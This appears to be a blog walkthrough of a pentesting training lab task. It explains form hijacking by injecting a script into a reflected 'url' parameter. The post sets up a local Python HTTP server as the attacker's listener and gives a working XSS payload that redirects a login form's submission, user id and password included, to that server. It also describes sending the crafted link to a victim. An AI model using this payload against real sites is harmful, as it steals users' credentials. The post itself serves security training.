Knowledge of forms in HTML and JavaScript is of great importance for Penetration Tester. In this post, we will see how to manipulate forms and will do form hijacking. Hijacking is a great Fun.Wait, but not an aeroplane hijacking, Guys be good. Here is another task from Javascript for Pentester through which we learn form hijacking. You can view solutions to the other tasks here.
Task 3: Hijack Form Submit | Task Link
It seems to be a troublesome task at first, if only you are new to javascript, but it is not that tough. The injection will happen at same parameter ‘url’. The task is to hijack the form and submit the user-id and password parameters to your own site. For that, we have to first setup web-server to handle the request. I had Python installed on my machine and then started the simple HTTP server on it by opening the command prompt and giving following command.
python -m http.server // for Python 3.X python -m SimpleHTTPServer // for Python 2.X
Now Attacker machine is ready to handle the request from the target site.
<script> document.forms[0].action="http://localhost:8000/" </script>
Copy and URL-encode the code provided above and paste it after the URL parameter in the address bar. This code will only change the action of the form, then send the URL to the victim and when victim enters the username and password and submit the form, it will be redirected to the attacker’s site. Further, you can run the PHP script on your server which will redirect the victim again to the requested URL. Following is the screenshot after victim made request.
That’s all. Refer this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided at Pentester Academy website.
